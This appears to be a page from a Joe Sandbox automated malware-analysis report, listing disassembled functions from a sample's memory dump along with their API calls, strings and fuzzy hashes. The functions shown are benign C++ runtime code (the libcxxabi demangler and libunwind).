Function 00007FF7797012D2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF779700B79
malloc.MSVCRT ref: 00007FF779701396
memcpy.MSVCRT ref: 00007FF7797013B5

Strings

starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF779701E55
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF779701E5C

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: mallocmemcpystrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 3344349799-3503049562
Opcode ID: 411cc94d638b4c5a65666b04f682356d8a7e8c8d03e2840adf31fc5fabca7cb3
Instruction ID: fe03e497fccda336ff3cf05c94aac187a923b9f438d35e31e1cf83c789c32f32
Opcode Fuzzy Hash: 411cc94d638b4c5a65666b04f682356d8a7e8c8d03e2840adf31fc5fabca7cb3
Instruction Fuzzy Hash: 5241646363AB0782EA61EF19A80116EE3B1FB497D0F940435DA8D07B51EF3CE145C3A0

Function 00007FF77970F160 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970F1A9
realloc.MSVCRT ref: 00007FF77970F1F5
realloc.MSVCRT ref: 00007FF77970F277
_assert.MSVCRT ref: 00007FF77970F2C8

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/Utility.h, xrefs: 00007FF77970F2BB
CurrentPosition, xrefs: 00007FF77970F2B4

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$_assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/Utility.h$CurrentPosition
API String ID: 940201557-3339543485
Opcode ID: 7acef73fbec41d6dfa1be67c13337ccc807f794cd771a4b3e4e2917c685efc0b
Instruction ID: 761971960fdd80dc695e45c3b5665bae2cefbee74d18240622abd54817738595
Opcode Fuzzy Hash: 7acef73fbec41d6dfa1be67c13337ccc807f794cd771a4b3e4e2917c685efc0b
Instruction Fuzzy Hash: 7F4143A7B26F4682EF65DF56E880269A771EB9CFC0F848531CB8E47794DF2CE4418250

Function 00007FF779718410 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF77971842F
wcscpy.MSVCRT ref: 00007FF779718490
wcscat.MSVCRT ref: 00007FF77971849B
wcslen.MSVCRT ref: 00007FF7797184AC

Strings

@, xrefs: 00007FF7797184E1
0, xrefs: 00007FF7797184D9
, xrefs: 00007FF77971850B

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: memsetwcscatwcscpywcslen
String ID: $0$@
API String ID: 468205783-2347541974
Opcode ID: e183844e820dd185498d54a444cfdf65eda0e2a936280ba6ff7fda81fa3f1c34
Instruction ID: 1c7be8c25c2de7c1e9fabefb7888166a3f28d94cdc8e8d3d9dae84fadd09b0dd
Opcode Fuzzy Hash: e183844e820dd185498d54a444cfdf65eda0e2a936280ba6ff7fda81fa3f1c34
Instruction Fuzzy Hash: D9419C6397E687C2F310EF14E4043AAE7B0EBC5784F804639E68C46AA5EF7CD1458B61

Function 00007FF77970B364 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970B3E6
memcpy.MSVCRT ref: 00007FF77970B400
_assert.MSVCRT ref: 00007FF77970B42A

Strings

starts_with(SV, "basic_"), xrefs: 00007FF77970B416
basic_string, xrefs: 00007FF77970B364
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF77970B41D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basic_string$starts_with(SV, "basic_")
API String ID: 2326172077-800580732
Opcode ID: 1cf50003512e3ea4dae628e96ebf30add7ca9d163f89edfb160867659c8d9a78
Instruction ID: a988b9913f5aefdf77dff7e5eeef862e9136ee1f8515c1c2aa9fd033ce4127a7
Opcode Fuzzy Hash: 1cf50003512e3ea4dae628e96ebf30add7ca9d163f89edfb160867659c8d9a78
Instruction Fuzzy Hash: EE015EA3A36643C3EE54AF19F9812A9A371EF987C5F844831C64D07795EF2CE5818360

Function 00007FF77970AA50 Relevance: 9.3, APIs: 6, Instructions: 291stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF77970AB61
malloc.MSVCRT ref: 00007FF77970AC3F
malloc.MSVCRT ref: 00007FF77970ACD3
strlen.MSVCRT ref: 00007FF77970AD56
malloc.MSVCRT ref: 00007FF77970AD7D
realloc.MSVCRT ref: 00007FF77970AE58

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$reallocstrlen
String ID:
API String ID: 2374275640-0
Opcode ID: 9fcff9b977f65c3a391a145938d85213577a97e659ce38ebb67324265da1d897
Instruction ID: fe51b830e87be325bd77c396c933ad09d1acd2d89e113d1b049ed772439b6032
Opcode Fuzzy Hash: 9fcff9b977f65c3a391a145938d85213577a97e659ce38ebb67324265da1d897
Instruction Fuzzy Hash: 43C1056362AB8282EB599F28D4543ADB7B1EB48BC1F848631CB9D073D5EF2CD551C360

Function 00007FF779708DB0 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779708DEE
realloc.MSVCRT ref: 00007FF779708E72
realloc.MSVCRT ref: 00007FF779708ECD
realloc.MSVCRT ref: 00007FF779708F2B
realloc.MSVCRT ref: 00007FF779708F7C
memcpy.MSVCRT ref: 00007FF779708F96

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 30d2cb59483826d978f11d2be31c172a2ece989509a146521bc4926f218ec95d
Instruction ID: 87c9f323824a831d7b226f9dfee3d2fa99f29232f6f7845e459f857d180fa1b3
Opcode Fuzzy Hash: 30d2cb59483826d978f11d2be31c172a2ece989509a146521bc4926f218ec95d
Instruction Fuzzy Hash: ED5163B3A26B8783DE649F56E8402A9A3B2EB58BC4F448531CB9D07791EF3DE4518350

Function 00007FF779705E30 Relevance: 9.1, APIs: 6, Instructions: 140COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779705E78
memcpy.MSVCRT ref: 00007FF779705E96
realloc.MSVCRT ref: 00007FF779705ED8
realloc.MSVCRT ref: 00007FF779705F35
realloc.MSVCRT ref: 00007FF779705F87
realloc.MSVCRT ref: 00007FF779705FE8

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: d16cc2fde265a49c118596b96dd5b5cfa61d07f1c591749a92ff39ed06f51163
Instruction ID: d402e12f5b6a16ccfd7eb8575d2a7123bfa4c527e240c08f927b65544afa6f29
Opcode Fuzzy Hash: d16cc2fde265a49c118596b96dd5b5cfa61d07f1c591749a92ff39ed06f51163
Instruction Fuzzy Hash: E85141B3A16B4783DA659F56E850269B3A1FB58BC0F848535CB8E47791EF3CE4418350

Function 00007FF779706030 Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779706078
memcpy.MSVCRT ref: 00007FF779706096
realloc.MSVCRT ref: 00007FF7797060D1
realloc.MSVCRT ref: 00007FF779706155
realloc.MSVCRT ref: 00007FF7797061AB
memcpy.MSVCRT ref: 00007FF7797061C5

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 6905e7ca18b6a58da2f216068c29ad50521c822ba058662085adb930a16d6f30
Instruction ID: cd1cd9fcdbcabc5d48ea236bddaa8190a8498b4ada2941de4ba0c6e757c59af1
Opcode Fuzzy Hash: 6905e7ca18b6a58da2f216068c29ad50521c822ba058662085adb930a16d6f30
Instruction Fuzzy Hash: B85140B7A26B4783DE689F16E8502ADA371EB58BC4B448531CB8E07791EF3CE4518350

Function 00007FF7796F4F64 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7796F4F78
TlsGetValue.KERNEL32 ref: 00007FF7796F4FAF
GetLastError.KERNEL32 ref: 00007FF7796F4FB4
LeaveCriticalSection.KERNEL32 ref: 00007FF7796F5072
free.MSVCRT ref: 00007FF7796F5094
DeleteCriticalSection.KERNEL32 ref: 00007FF7796F50BD

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
String ID:
API String ID: 3326252324-0
Opcode ID: 08f0997568cc7a319e12c3eb93543c3c92b5c3fd4d446526cdcdb6b294db1472
Instruction ID: 91503a751cddb127c7509bee2efae1a2ffa7dc86d7334fd2b22454d322116d1e
Opcode Fuzzy Hash: 08f0997568cc7a319e12c3eb93543c3c92b5c3fd4d446526cdcdb6b294db1472
Instruction Fuzzy Hash: 7C211527A7BA0386F655AF01A804376E772BF45BD1FC40535C80D83AA4EF2CAD5683B0

Function 00007FF77970ED80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF77970EDB1
realloc.MSVCRT ref: 00007FF77970EE68
realloc.MSVCRT ref: 00007FF77970EEFF

Strings

pixel ve, xrefs: 00007FF77970EE8C
vector[, xrefs: 00007FF77970EE7D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$malloc
String ID: vector[$pixel ve
API String ID: 454241450-4216275618
Opcode ID: c7e31e28da302632c023a726f4a17732f91bf8205f05fac472730efd64aa863f
Instruction ID: 42856b5de8367f2908a96093a8583d6b5d938d34b409a3ce1f18e75e9902ec4b
Opcode Fuzzy Hash: c7e31e28da302632c023a726f4a17732f91bf8205f05fac472730efd64aa863f
Instruction Fuzzy Hash: 3941B1B3A26B8A82DA14DF16E8446ADB7B5FB58BC0F448531DF8D477A0DF38E5528340

Function 00007FF779700BE5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF779700B79
malloc.MSVCRT ref: 00007FF779700C1B
_assert.MSVCRT ref: 00007FF779701E69
malloc.MSVCRT ref: 00007FF779701EB6

Strings

starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF779701E55
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF779701E5C

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$_assertstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 3012236610-3503049562
Opcode ID: 01387742c7347a065d0d3fa100ad1a8c0eb405b46fc2f649a98275b690413a58
Instruction ID: a37b87b9f6bfce6b418f4301a70aebfa75a4d2ac78354b2abb3e5e551aa75c35
Opcode Fuzzy Hash: 01387742c7347a065d0d3fa100ad1a8c0eb405b46fc2f649a98275b690413a58
Instruction Fuzzy Hash: 8E410433626B8285EB51DB18E4047A877B4FB48B91F514235DE5C0B7A1EF38E292C360

Function 00007FF7797087F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF779708833
realloc.MSVCRT ref: 00007FF77970889B

Strings

> typena, xrefs: 00007FF7797088AC
ame , xrefs: 00007FF7797088BA
template, xrefs: 00007FF779708848

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: > typena$ame $template
API String ID: 471065373-2892875084
Opcode ID: 9e9012e4aaa5198cb7273f277177ca7dcf34f7861e77788661574f326ce0afe6
Instruction ID: 4efa72c2e717564957e06f6345a27962ab047b80766bde298f3d42b0909b6469
Opcode Fuzzy Hash: 9e9012e4aaa5198cb7273f277177ca7dcf34f7861e77788661574f326ce0afe6
Instruction Fuzzy Hash: C6314FB3A26B4682DA29EF16E9441A9A771FB98BC0B408531CF8D47794EF38D5928350

Function 00007FF77970A260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970A298
realloc.MSVCRT ref: 00007FF77970A2F7
realloc.MSVCRT ref: 00007FF77970A37B

Strings

sizeof.., xrefs: 00007FF77970A2AD
&, xrefs: 00007FF77970A31C

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: &$sizeof..
API String ID: 471065373-1098962357
Opcode ID: adf8345375f33b976376b6f3066ba57d42a7cef233737129a130052d44d8b66c
Instruction ID: 6ea8088946f10116c489370c9fdee8e25f519ec09adbe99dc5fcd29c31a2d031
Opcode Fuzzy Hash: adf8345375f33b976376b6f3066ba57d42a7cef233737129a130052d44d8b66c
Instruction Fuzzy Hash: 71316EB3A16B8683DA299F45F4442ADF3A1EB98BC4F448531DB8E47795EF3CD4418350

Function 00007FF77970E920 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF77970E970
realloc.MSVCRT ref: 00007FF77970E9CB
realloc.MSVCRT ref: 00007FF77970EA27

Strings

volatil, xrefs: 00007FF77970E9DC
restric, xrefs: 00007FF77970EA38

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
Instruction ID: e13c3df37df83ed1fa1dfa840747530622cec56ed9da6cde6b117ab9a2329df9
Opcode Fuzzy Hash: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
Instruction Fuzzy Hash: 26414FB3A26B8682DA68DF49E54426DA771FB98BC4F508431DB9E477A0EF3CE441C350

Function 00007FF7796F3D90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF7796F3E24
fflush.MSVCRT ref: 00007FF7796F3E7E

Strings

libunwind: __libunwind_seh_personality() LanguageHandler returned %d, xrefs: 00007FF7796F3E62
CCG , xrefs: 00007FF7796F3E0C
libunwind: __libunwind_seh_personality() calling LanguageHandler %p(%p, %p, %p, %p), xrefs: 00007FF7796F3E05

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflush
String ID: CCG $libunwind: __libunwind_seh_personality() LanguageHandler returned %d$libunwind: __libunwind_seh_personality() calling LanguageHandler %p(%p, %p, %p, %p)
API String ID: 497872470-3214979313
Opcode ID: 5331a38f71f5f04ee22fa3a2a17e78d251d856f83c24bee91c8b074b7409e614
Instruction ID: 2911992498150cdf8e9dbf906d913d93e365732734d7ea1a3f417500d7e6e7ba
Opcode Fuzzy Hash: 5331a38f71f5f04ee22fa3a2a17e78d251d856f83c24bee91c8b074b7409e614
Instruction Fuzzy Hash: 24313E27E3964281EB10AF65E4407AAA273FF897C0F844136DE8D87795EE3CD4458760

